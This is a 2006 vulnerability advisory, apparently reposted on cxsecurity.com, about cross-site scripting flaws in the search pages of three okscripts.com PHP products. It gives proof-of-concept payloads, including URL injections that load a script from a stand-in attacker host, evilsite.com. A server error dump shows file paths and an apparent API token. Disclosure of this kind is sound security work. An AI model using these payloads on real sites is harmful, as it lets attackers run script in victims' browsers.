okscripts.com - XSS Vulns

2006-06-14 / 2006-06-15
Credit: luny youfucktard com
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-3001 | CVE-2006-3000 | CVE-2006-2999
CWE: CWE-79

OkMall v1.0 Homepage: http://www.okscripts.com/ Effected files: search.php XSS Vulnerabilities: The search inputbox doesn?t properally filter using input before generating it. Backslashes areadded but we can easily evade this. ForPoC try putting a [imgsrc=lol.jpg]in the search box. XSS vuln via URLinjection with possible buffer overflow?: http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5& page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] The above PoC creates the error msg: Warning: fopen(http://xml.amazon.com/onca/xml3?locale=us&t=boxxnetcom-20&dev-t=06 464ERBRYHMP1RY3W82&KeywordSearch=a__b_e_&sort=+pmrank&offer=All&mode=cla ssical&type=lite&page=This is remote text via xss.jslocated at evilsite.com&f=xml): failed to open stream: HTTP request failed! HTTP/1.1 500 Server Error in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 59 Warning: feof(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 60 Warning: fread(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 61 and continuously outputs feof() and fread() error messages on the page. Buffer overflow? ------------------------ QuickLinks v1.1 Homepage: http://www.okscripts.com/ Effected files: cat.php XSS Vulnerabilities: The search inputbox doesn?t properally filter using input before generating it. Backslashes areadded but we can easilyevade this. ForPoC try putting [IMG SRC=javascript:alert(?XSS?)] in the search box. XSS vuln via URL injection: http://www.example.com/quicklinks/demo/search.php?q=[SCRIPT%20SRC=http:/ /evilsite.com/xss.js][/SCRIPT] -------------------------------------- OKArticles v1.0 Homepage: http://www.okscripts.com/ Effected files: search.php XSS Vulnerabilities: The search inputbox doesn?t properally filter using input before generating it. Backslashes areadded but we can easilyevade this. For PoC try putting [IMG SRC=javascript:alert(?XSS?)] in the search box. XSS vuln via URL injection: http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http:/ /evilsite.com/xss.js][/SCRIPT]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top